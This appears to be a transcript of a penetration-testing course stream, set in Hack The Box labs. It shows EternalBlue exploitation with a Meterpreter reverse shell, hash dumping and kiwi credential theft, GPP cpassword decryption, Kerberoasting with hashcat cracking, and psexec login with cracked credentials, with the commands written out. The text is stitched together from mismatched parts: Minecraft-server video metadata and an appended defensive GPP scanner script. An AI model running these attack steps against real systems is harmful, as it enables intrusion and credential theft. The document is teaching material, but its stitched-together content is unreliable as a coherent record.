If you're running Nessus, Nessus is going to do this for you, but you should always do this anyway; this is a backup check. If you see SMB open on a network you should be checking to see if it is exploitable, or at least potentially vulnerable, to MS17-010. This is, like I said, one of the most common and easiest attacks in order to get the system. Okay, so here's the script we ran: nmap -p 445 with the script, and then it spits out, hey, looks like it's vulnerable to this remote code execution, right? And if we were to rescan, we would probably see more being mapped this time around, and we did get it back. Okay, we actually got back our scan for Active as well, cool. So we've got this scan here saying it's vulnerable.

So at this point, if we're a pen tester, we've got a couple of options depending on what the client has told us, right? The client says, hey, you have free rein, go ahead and do whatever you want; or the client says, hey, you know what, before you run any crazy exploits please let me know, because an exploit like this may actually take down the system. It may mess things up depending on what the system is doing; if this is some sort of critical infrastructure where it can't go down, you might not want to run the exploit, right? So it's important to know on these RCE exploits that you're probably better off being safe than sorry, and you don't want to take something down that's critical and have a client stop it. So you call up the client, the client says okay, fire away, and that's kind of where we're at here with this exploit.

So if we come in, let's go back into Metasploit. And I'm thinking, guys, this stream is not going to make it to the live cut, so what I'm probably going to do is piece together old streams that I have on these topics and draw them in; you should have been there for the live show, and we'll just call this a special night. So, oh yeah, oh my god. exploit/windows/smb/ms17_010_eternalblue, right? So just copy this bad boy and paste it. This is one beauty. We're going to set the RHOSTS to 10.40 and then we are going to run this. Now a couple of things to note. First thing to note is this might not work on the first try or the second try; it might take a few tries to actually work. This is a very, very tricky exploit to get running. Of course it runs on the first time and gets us a win. Next thing to know, it puts us right into a command shell. So if you are a Meterpreter fanboy like I am, this is not the best situation; we can improve upon this, right? So this is just a generic payload. We can say whoami and it puts us in as authority\system, which is great, but let's Ctrl+C out of this and just say yes.

Okay, so let's say options again. This time we can see the payload options as generic/shell_reverse_tcp, and we're just going to say show payloads and see what's available to us. We've got 43 payloads, but I'm going to use the Windows 64-bit Meterpreter, so let's just say set payload windows/x64/meterpreter and then let's just double-tap Tab to see our options. Reverse TCP is probably the best bet here. Always good to double check our options as well: once we set the payload we want to make sure that our LHOST is still holding true, and our LPORT is also still holding true. Sometimes it resets these down to nothing, or if you've gotten an exploit running already on a port, which is sometimes the case, it might default to this 4444; you might want to set it to something else.

All right, so now let's go ahead and run this again. Let's see if we get lucky twice in a row on the first fire. And sometimes we can crash the machine, especially if there's a bunch of us on the same network doing this. Fingers crossed that we don't do that, and we may fail our first one here. So we failed the first one, that's okay. It's going to try again with different groom allocations and see if it works. All right, we have a session. So this is a two-point concept, through both of my points: don't worry if it fails, you might even get it failing three times through. You might need to rerun it again, so rerun it a couple of times if it's failing and looks like a false positive. And also, second point here, we can always improve our shellcode on these 64-bit machines. So now we've gotten Meterpreter; we'll say sysinfo on this. All right, we've got the 64-bit Meterpreter, we've got the 64-bit architecture, perfect.

And now we can also look around. One of my favorite things to do is to say hashdump. Okay, we just dumped the hashes for the administrator and the haris account. So like we talked about last week, I would take these hashes and try to pass them around, right? We can use CrackMapExec, we can try with psexec in the network, see if we get in anywhere. So definitely, definitely critical. One of the first experiences I had on a pen test with EternalBlue was getting a hash dump like this and then passing the administrator hash and getting access to pretty much every machine because they were cloning machines. So it's always worth trying psexec and passing the hashes around like we did last week to see where you have access to. Of course, we can shell into this and we can look around the file system. You know, we could cd to Users and then say dir and see who's in here. Okay, Administrator is in here; what does Administrator have in their folders right there? Okay, maybe go to the Documents. You know, you'll come up with ways to search for sensitive files and have keywords and stuff like that, but these are the things you're looking for: like, what can I find on the system, what kind of access do I have.

You want to see, you know, who it's talking to, what the ARP table looks like. Of course there's not going to be another one in this network that it's chained to, but you want to see that through arp. You want to say route print and see what the routing table looks like. netstat, that's another good one to look at. So if we do netstat -a, hey, you know, we can look at all the connections that are coming in and going out, right? So we talked about it a little bit last week about dual-homed machines, for example: if this PC for some reason had two NICs and one NIC was sitting on a 10.10.10 network and the other was sitting on 10.10.11, for example, we might be able to see that the 10.10.11 is talking to a whole different network that we had no access to, and we're going to talk about that in more depth next week when we talk about pivoting. So that's a pivoting situation; we want to go into a, you know, different network. How will we investigate these higher ports? So these higher ports, if you look at what we're doing, like the 4444 here, those are established from us connecting, so we opened the port on their end. These other ones, who's to say what they are, we'd have to see. You see a lot of high ports like this going out, like 443 and other, you know, internet addresses; these could be other people's shells for all we know. It's hard to say without being able to go into the machine. So we want to look at those things.

Of course, Ctrl+C. We can load some extra modules as well; we can load incognito, which is my favorite, and we just say list_tokens -u for user. Okay, and if we're on a domain network we may catch a domain administrator who had logged into this account. Remember we talked about the tokens and how they worked last week. Obviously there's no domain account here to log in to; we're not doing that, but it's something to look for. If we're using 64-bit architecture we can load kiwi. Kiwi is awesome. One of the best commands is creds_all; again, we talked about this last week. No creds here, but if we type in help, there's more than just creds_all: we can talk creds_kerberos, golden ticket attacks come through this, we do wifi_list, that lists the Wi-Fi profiles. So there's a lot of things that we can get just off of kiwi.

So these are some things to look for, things we've talked about; it should all be coming together, right? This is just a very, very simple exploit, but the post exploitation is really the most important. Like, we owned this machine in two seconds, and there's a reason it's on top of my list; like I said, it's on most major networks. Since we owned it so fast, we need to be able to make sure we enumerate around everywhere, right? We're looking for sensitive files: do those hashes work and where do those hashes lead us, can we impersonate a domain admin, what kind of net commands can we get access to, etc. So every little computer has a piece to play in the final picture; it's just seeing how that piece fits into the puzzle. What's the difference between mimikatz and kiwi? Kiwi is a 32-bit... sorry, mimikatz is 32-bit. If you say load mimikatz it's going to say, hey, you're loading onto a newer architecture, right, OS, so we want to actually use it on some older architecture. Kiwi is the newer and better mimikatz. All right, so we're going to call this one a day. This one was just going to be a 20-minute box that's turned into 45 minutes. Again, I'm very sorry guys, even I struggle, you know. So let's go ahead and close this out and let's go ahead and talk about the results from this machine here called Active.

Now Active is one of the favorite boxes I have encountered in the Hack The Box labs because it is realistic, it's very realistic. So if we look at it there are some signs that what we're up against is likely a domain controller. You can see that it's running DNS, it's got Kerberos, which is an authentication system, we've got 139 open, we've got LDAP, the port for Active Directory right there; that should be a pretty big sign that we're running a domain, and the domain here is active.htb. We can go through all the ports here; it's very, very similar, like I said, to a domain controller. So when we see this, we look down here: SMB, and common to domain controllers, SMB signing is enabled and required. Most of the SMB relay or the NTLM relay is done on other than domain controllers. Sometimes you're lucky and it's turned off, but Microsoft got smart and enabled that for Windows Server, I don't even know what versions onward, but it's as of late been running this just fine. So this looks like 2008, so god knows how long it's been doing that. And other things that we could look at, right: we can maybe dump LDAP info; for me that's a little bit more advanced and outside of the scope. I've seen that done in some Hack The Box boxes without credentials, but typically you're not going to have access to that without credentials, but that's something to think about and to study. Like, if you get this box back on an assessment, say for example it's the only box, you're going to want to look through each single one of these ports and say what's interesting to me, right? The first thing that's always interesting, on my behalf, is always 445 and 139, because the more time you spend in pen testing, the more time you have to realize that SMB is behind a ton of exploits. So do note, it looks like they may have some sort of HTTP API going on. I would investigate everything that says it's open and probably not tcpwrapped, so definitely worth looking into.

So here, the first thing we're going to look into is going to be 445. So what we're going to do is I'm going to go in and use a tool called smbclient. So it's going to look something like this: we're just going to say smbclient, we're going to do -L; I think it stands for list, don't ask me what it stands for, I don't really know. And we're going to list out the contents of the directory. It's going to ask for our password, we're going to try hitting Enter, and it says anonymous login successful. This is a finding. So this finding is that we shouldn't have an anonymous login, right? You shouldn't know what sort of SMB shares are out there. So we've got these shares here, we're able to see those; we would absolutely list this on a report. Now what we can do with these shares depends on how critical, you know, this finding becomes. Right now it's just a low finding: close up the anonymous login. So from here we'd want to see what folders we can actually connect to. Now the juiciest folders might be something like this C$ share or the remote admin; we can see if we can connect to those folders. So to connect to a folder we just say smbclient, we do the character escaping just like I'm doing here, and we'll just say something like ADMIN$ and try to connect. Hit Enter and then it says access denied, even though we have anonymous login successful. So I'm going to cheat a little bit and tell you that the one that works here is the Replication folder. We hit Enter, Enter again, we are successful.

Okay, so we have an SMB login here; we are in this Replication folder. Now if we type help we can see a full list of commands of what we can do; it's very, very similar to Linux. We can say ls and see what's in here. Okay, it looks like there's a folder called active.htb. We could say cd active.htb, ls again. Okay: Policies, scripts, DfsrPrivate, and it's called Replication, so it looks like it's probably a backup of something, right? And a backup of what, who knows, but we can figure that out for ourselves. Let's cd back then. Instead of digging through all these files there's an easier way to do this. So let's just say we want to download all the files and folders that are here. What we're going to want to do that with is something called mget, but before we just do an mget, we're going to say recurse on, because we want to deal with all the folders recursively, and to save some time we're just going to turn off prompts; so we're just going to say prompt off, and now all we have to say is mget with an asterisk, like this, and it's going to start downloading stuff. Okay, and we only grabbed like eight files here. If we look through the files that we're grabbing, looks like we grabbed GPT.INI, GPE.INI, a .inf file, and then I see, okay, I see this Groups.xml. This is something that is really well known to me, and this is something that is likely going to be pay dirt for us. So let's explore what's in the Groups.xml and then we'll talk about why it's so relevant. So I'm just going to say bye; okay, I guess there's no bye here, just Ctrl+C. If we ls in this folder, or we say cd, I think it should just be active; it should have the same folder structure, so cd active, Policies. Actually, this is probably better to just do in a GUI form: Documents, download, active, and we say it was Policies, the {31B... policy folder, MACHINE, Preferences, Groups, and then open up this Groups.xml.

Okay, so it might be a little hard to see, so let's talk about what this GPP is, what this Groups.xml is. So Groups.xml is related to something called GPP; Group Policy Preferences is what it stands for. An easy way to remember this on a pen test: if you ever listen to rap, there's a song called "Are You Down with OPP?"; well, just think to yourself, are you down with GPP, and make sure that you search for GPP, right? So you've got this Group Policy Preferences, and what it did was it allowed domain admins to create domain policies using embedded credentials, right? So the credentials are right here in this file. You see the username active.htb\SVC_TGS here, ticket granting service, and we'll talk about the ticket granting service here in a second, and then you see this thing called the cpassword. This is what we're after, and there's actually a great article by Rapid7 that I've got up here; it's called Pentesting in the Real World: Group Policy Pwnage. It talks a little bit about GPP and what it does, probably better than words I could put it in too, but basically you were able to store the username and password; you created it, right, for an account to do some action, say file sharing or whatever it is, through group policy. This was up until a few years ago. So these keys are just stored in the SYSVOL folder, right, and what you can do is there's actually a Metasploit module which I want to show you. We won't use it tonight because we have no need, we've already got the file, but I run this on every single internal assessment and you will not believe how many times the cpassword or the GPP just shows right up. So if you search GPP, the Groups.xml file just exists on an active domain; it is just on some active domains. This is for older domains, but sometimes even when they migrate they leave that file in there, and we're going to talk about that too. So if you see the post/windows/gather/credentials/gpp module: as long as we have some sort of access on a session we could say use post/windows/gather/credentials/gpp, look at the options. So we need a session, right; it could be a psexec, whatever session we get. Once we have a session we can run this; we may be able to get a domain administrator password just from this. So very, very important to try to run this on any internal, anything that you can.

So another thing to note, though: we have set this up in the past for clients as what's called a canary account. Basically what we're doing is we put in an account that has a GPP cpassword and it's never been used, but it is sitting there as a honeypot, right? So when an attacker's in your network and they're looking for this low-hanging fruit, because GPP is low-hanging fruit, we say okay, they find the file, they see the username and credentials, and as soon as those username credentials get used then we know an attacker's on the network, right? So just because this is low-hanging fruit, your competition might be using it as bait, so always think about that as well. But typically on a pen test it's something that we've grabbed right away.

Okay, so let's talk about how we can exploit what we just found. So let's open up this file. We've got the cpassword here. I want you guys, if you're following along, to copy the cpassword, and what we're going to do is say gpp-decrypt; it's built into Kali, and then we should just be able to paste this password here. We get a warning, but don't worry about it, the cipher is deprecated. So what we're going to do is we're just going to copy this and let's just paste it somewhere that we can have it, right? Okay, so what this means now is we have an account. We've got this domain here, active.htb; we've got this service ticket granting service account here. So what can we do with this? Well, we can use CrackMapExec again, try to push it around, right, see what we can do with it. We can try to go back into smbclient, try to log in with this account and see if we can get into the admin folder. You know, I could use psexec on this machine; that was the first thing I did on Active, to say okay, does this have access to the share folder and administrative privilege? So I try psexec; psexec doesn't work either, but be thinking about the same process for everything you're doing. So psexec, you know, CrackMapExec, etc., whatever we can do with these credentials, we're going to try to get in anywhere, everywhere that we can. Well, we're in a one-box network right now.

So another tactic that we're going to talk about, and tactic number four on this list, is Kerberoasting. So we are going to talk about roasting. Let me minimize everything and bring out my handy-dandy pen so I can explain this as best as I can. There's probably going to be somebody out there who is a domain guru and going to correct me on this, because you people like to correct me all the time when I say something wrong, so sorry in advance if I misquote this, right? So let's talk about my best interpretation of what Kerberoasting is, and before we can do that let's talk about Kerberos. So Kerberos is just an authentication protocol, right? It uses tickets, so it's using tickets as a form of communication and authentication. So let's assume a situation, and this is how it typically is... that is a huge [ __ ] thing, all right, let's clear that, let's try that again. All right, we've got this machine here; this is our server. Our server is also considered a KDC, right, it's a key distribution center, because we're giving out keys. All right, we also have another computer here; we'll just call that the client, right? So we've got the client and the server. Well, let's say the client wants to authenticate, right? So it's going to come to the server and it's going to say, hey server, you got those tickets, can I get a ticket? It's going to ask for a TGT, a ticket granting ticket. Now the server is going to check the credentials, and if the credentials are good it's going to send back, over encryption, which is TGS, ticket granting service, it's going to encrypt a secret key; remember, key distribution center. It's going to send back a secret key that gets stored on the client. So this client has a ticket stored here until the ticket expires. Now let's add a pawn to this story. Let's say that there is a service that we want to connect to, right? Come down here; we'll call this "service", and the service could be whatever we want it to be: SQL, antivirus, you name it, but let's just call this a SQL service, okay? Services have what we call SPNs; these are service principal names. So to connect as a client we need to ask for permission to connect to the service. We say, hey SPN, I've got my ticket, I'm going to take this, and can I please connect to this SQL service? And we get a session key back from the server if we have the credentials right, or the ticket at least, to connect. So the thing to know about Kerberoasting is that with any valid ticket or TGT, we can request a TGS ticket for this SPN. So lots of acronyms, right; if you're military or former military you're probably following along just fine, but there are a lot of little letters here. Just know that if we have a valid ticket we can request via the SPN here, at least to attempt, to get a TGS, right? So we're going to see what that looks like. There's actually a tool that does that for us. How did I do, you domain people, did I do okay?

All right, let's pull this back up, and this is part of Impacket, right, the whole thing we've been using this entire time, what we installed in the beginning; I told you it would be important, this toolkit. So Impacket is awesome. So let's go ahead and locate what we're going to be running; it's called GetUserSPNs. You see we have a few; the one we installed in the course was the /opt/impacket one, I'm going to use that one. So I'm going to cd to /opt/impacket/examples. All right, so now we ls; there's a bunch of stuff in here, but we're going to be using that GetUserSPNs.py. We're just going to say python GetUserSPNs.py. All right, first things first, we need the account; the account was active.htb and it was SVC_TGS, right? Next we need to say -dc-ip; we need to know the IP of the domain controller. Well, lucky for us, this is the domain controller. And last we need to request the ticket, so we're going to do -request. Ah, we need a password, so we come back in here, we copy this guy, we paste, and we get this wonderful thing back here. So we see that we have captured something here for the administrator, right; we've got this long hash and it's a krb5tgs. So what can we do with this? Well, we can take this offline and try to crack it and see what happens, and we're going to do just that. So have your handy-dandy hashcat ready; I'm going to load mine up now, give me one second, as I am not as prepared as you guys are.

Okay, so I'm going to run hashcat. We're going to say --help; we are looking for krb5, which is 13100, if I am not mistaken. There you go, under Network Protocol, 13100, Kerberos 5 TGS-REP. Okay, so we know our module is 13100. If you've been following along week to week you should know how to run hashcat now, right? hashcat64.exe, we're going to do a module of 13100, I named this file kerberos.txt, and all I did was copy this entire line all the way down to the end and put it into a file. I'm going to run this through rockyou. I've got a brand-new 2080 Ti that we're going to push this through; I haven't actually run any hash cracking on it yet, so let's just hit Enter and see what happens. And it took us not that long at all. So we went through, where is it, 77% of the list, and this is 14 million passwords long, so that's pretty good. All right, so it's cracked; you can see that it's cracked: Ticketmaster1968 is the credential. So we're going to take that and I'm going to paste it in here.

Okay, and now let's load up Metasploit; we actually have it loaded. What we're going to do is we're just going to search for psexec; we're going to use exploit/windows/smb/psexec, number 11 on my screen if you don't see it. Let's talk options. Okay, so we've got SMBDomain, remember that is active.htb; SMBUser is administrator; SMBPass is that Ticketmaster pass. It'd be helpful if I hit the word set in front of that. Let's try running it, see if we get lucky. I'm kind of indifferent on the... I never set our LHOST, sorry guys. All right, let's try again, see if we get lucky. Okay, so it's like a PowerShell; let's look at our targets. So we're on automatic; let's try a native upload instead. So we see that we authenticated, we uploaded the payload, it's creating, it's deleting, and it's hanging. Let's try target 3. You might have to go back to target 2... and frankly, oh my, the LHOST is not good. Good, good job on that one. So, as pointed out, thank you very much, the LHOST got pointed to my machine and not the Kali machine, or the IP address that's here. So let's set the LHOST; if yours did that also, set yours. I think mine's 36, oh no, it's 21 now. All right, so let's set target back to 2 and run again. There we go, thank you TechnoBro.

All right, so we've got a shell: sysinfo on the shell, 64-bit Meterpreter, 64-bit architecture; getuid, we are authority\system, we have full access on this PC. Again, same concept here, right: we would load incognito, list_tokens, see what tokens are out there; we can do a hashdump, dump the hashes, pass them around, see what information we can get from that. This is one of the more realistic boxes, like I said, in terms of teaching you two common internal tactics. Kerberoasting is obviously one of the more common that's going to lead you somewhere, but a GPP cpassword is something you should be checking on pretty much every assessment, because that does lead to an easy win. You would be surprised how many companies have their passwords stored, or even if they've migrated or updated somewhat, an older password that is similar to what their current password is. So any password that you can get is absolutely relevant. So with that being said, and this stream being all kind of screwed up, we still finished at 11 minutes past, so that's not terrible. I'm going to change my screen over to IRL and we can talk shop for as long as you guys want to, probably a hard stop at ten. Let's go ahead and actually just get started. My dogs are going crazy, that's awesome. I forget what buttons... there we go.

Welcome, welcome. Unless you want to see my pretty face, we can do that, there you go. Welcome to the last episode of Zero to Hero. We are week 11; you've made it to the end. So we're going to do some quick housekeeping, we're going to talk file transfers, we're going to cover some cool little tricks that I like file-transfer-wise, maintaining access, pivoting and cleanup. We are going to do a lab on pivoting, we're going to talk maintaining access and cleanup, and I'll get into that and the reasonings why. Then we're going to cover legal, we're going to cover report writing, and finally we're going to end on career advice. So we'll talk some legal documentation, I'll cover that example report that I put out; if you haven't seen it, now's the time to talk about it, and then I'll give you my career advice, tips, etc., tip my hat and sign off. So we'll do Q&A, AMA at the end.

Let's just go right into the housekeeping. So like I said, this is the last stream. Immediately after this stream I'll be breaking some protocol and I will be uploading the stream onto YouTube; there's a 24-hour waiting period of understanding, lol. I'm also going to be putting it on the Zero to Hero pentesting page on thecybermentor.com, so if you're looking for that repository it's on there as well. The course will be full and it'll be done tonight. 30-minute AMA, two reasons why: I am on three and a half hours of sleep. I want to party so bad with you guys, but I have a flight at six o'clock in the morning. As of just a few minutes ago I got a text message saying that they may have cancelled the flight, so that's great, because we've had this booked forever. My wife is handling that right now. The flight doesn't say that it's cancelled online; the text message said it was, so she's on the phone dealing with Southwest Airlines right now. So as of right now, potentially leaving at six in the morning, and I'm running on three and a half hours of sleep. You guys ask me all the time how I get the work done: I never sleep. So don't be like me, definitely try to get some sleep. So because of that we're going to push the drinking game into next week. Next week we'll just have a super, super chill chat; what we'll do is we'll drink, we'll hack things, we'll have fun. I'll try to take a different topic that we haven't covered before, something a little different, and we'll just have some fun with it.

So other than that, a favor to ask of you guys: if you guys are enjoying the course, if you enjoyed your journey, please do consider leaving me some feedback. You could leave it for me on Discord, on LinkedIn, on Twitter; I would greatly appreciate that. Many of you already have, and that's awesome. Full disclosure, I am planning to do this course again in a paid version, which is just going to include some more updated material; it's going to have an actual lab built out to where we dig into it. So you guys got the free edition; the free edition covers pretty much everything I wanted to be covered. The labs are going to be a little bit more upgraded, and I would love to use some testimonials if you guys don't mind that. So that's my only ask of you guys. Other than that, tell a friend, say hey, you know, I enjoyed this course, you guys should check it out on YouTube or whatever; that would be great.

So other than that, let's go ahead and just dive into our lesson. So I actually put that in the wrong spot: we're going to talk about transfers first, then we'll talk maintaining access. So if you are looking to take the course, the course will have a discount for students, first responders and military; vets, military active, doesn't matter, you just got to let me know ahead of time and we can work it out. It's a 20% discount, if you guys want to retake this course. But anyway, so let's go ahead and talk file transfers. So tonight we're going to do file transfers with Linux; typically Linux file transfers are wget, so we're going to look at wget and then we're going to look at some Windows tools. We're going to look at HTTP, FTP, Metasploit...

Video Information
This video, titled ‘Minecraft Anarchy #050 – Full Ethical Hacking Course 5/6’, was uploaded by ZillyGurke on 2020-03-08 10:29:03. It has garnered 8 views and 0 likes. The duration of the video is 00:46:17 or 2777 seconds.
Lasergurkenland anarchy server ip: 149.202.127.134:25565, domain: zillyhuhn.com. It is a small vanilla Minecraft server without rules. freecodecamp.org talks watched in this video: https://www.youtube.com/watch?v=3Kq1MIfTWCE
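As an added example tied to the GPP Groups.xml discussion in the transcript above (my own code, not the course's or the speaker's), here is a defender-side check that walks a copy of the SYSVOL Policies tree and reports which preference files still carry a cpassword attribute, and for which account, without touching the encrypted value. The domain name, the {EXAMPLE-POLICY-GUID} folder and the XML contents are constructed sample data; the file names it looks for are the preference types that are known to embed cpassword.

```python
"""Defender-side check for Group Policy Preferences (GPP) files that still embed a
cpassword attribute in SYSVOL. Added example: it assumes a local copy (or mount) of
the SYSVOL\\<domain>\\Policies tree and only reports where such values live; it never
decrypts or copies the encrypted value into its output."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference item files that are known to carry a 'cpassword' attribute.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Attribute names under which the different preference types name the account.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed sample, modelled on the Groups.xml layout discussed in the transcript.
# The cpassword value is a placeholder, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="EXAMPLE\\svc_account" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDER_ENCRYPTED_VALUE"
                neverExpires="1" acctDisabled="0" userName="EXAMPLE\\svc_account"/>
  </User>
  <User name="EXAMPLE\\no_pw" changed="2018-07-18 20:47:00">
    <Properties action="U" userName="EXAMPLE\\no_pw"/>
  </User>
</Groups>
"""

# A preference file of another type with no embedded password: must not be flagged.
SAMPLE_SERVICES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NTServices>
  <NTService name="Spooler">
    <Properties startupType="AUTOMATIC" serviceName="Spooler" accountName="LocalSystem"/>
  </NTService>
</NTServices>
"""


def policy_guid_from_path(path):
    """Return the {GUID} policy folder name a file sits under, if any."""
    for part in path.split(os.sep):
        if part.startswith("{") and part.endswith("}"):
            return part
    return None


def scan_gpp_tree(sysvol_root):
    """Walk a SYSVOL copy and report every preference element that embeds a cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for fname in files:
            if fname.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError as exc:
                # A malformed preference file is itself worth a look, so keep it.
                findings.append({"file": path, "error": str(exc)})
                continue
            for elem in root.iter():
                cpw = elem.get("cpassword")
                if not cpw:  # absent or empty: no stored password on this element
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
                findings.append({
                    "file": path,
                    "policy_guid": policy_guid_from_path(path),
                    "element": elem.tag,
                    "account": account,
                    "never_expires": elem.get("neverExpires") == "1",
                })
    return findings


def build_sample_sysvol():
    """Create a throwaway directory laid out like SYSVOL\\domain\\Policies\\{GUID}\\..."""
    base = tempfile.mkdtemp(prefix="sysvol_sample_")
    pref = os.path.join(base, "example.test", "Policies", "{EXAMPLE-POLICY-GUID}",
                        "MACHINE", "Preferences")
    for sub, fname, body in (("Groups", "Groups.xml", SAMPLE_GROUPS_XML),
                             ("Services", "Services.xml", SAMPLE_SERVICES_XML)):
        os.makedirs(os.path.join(pref, sub), exist_ok=True)
        with open(os.path.join(pref, sub, fname), "w", encoding="utf-8") as fh:
            fh.write(body)
    return base


if __name__ == "__main__":
    for hit in scan_gpp_tree(build_sample_sysvol()):
        print(hit)
```

Point `scan_gpp_tree` at a real SYSVOL copy to get the same finding records; the canary-account idea from the transcript can be checked the same way, since a canary entry shows up here too and is simply excluded by name.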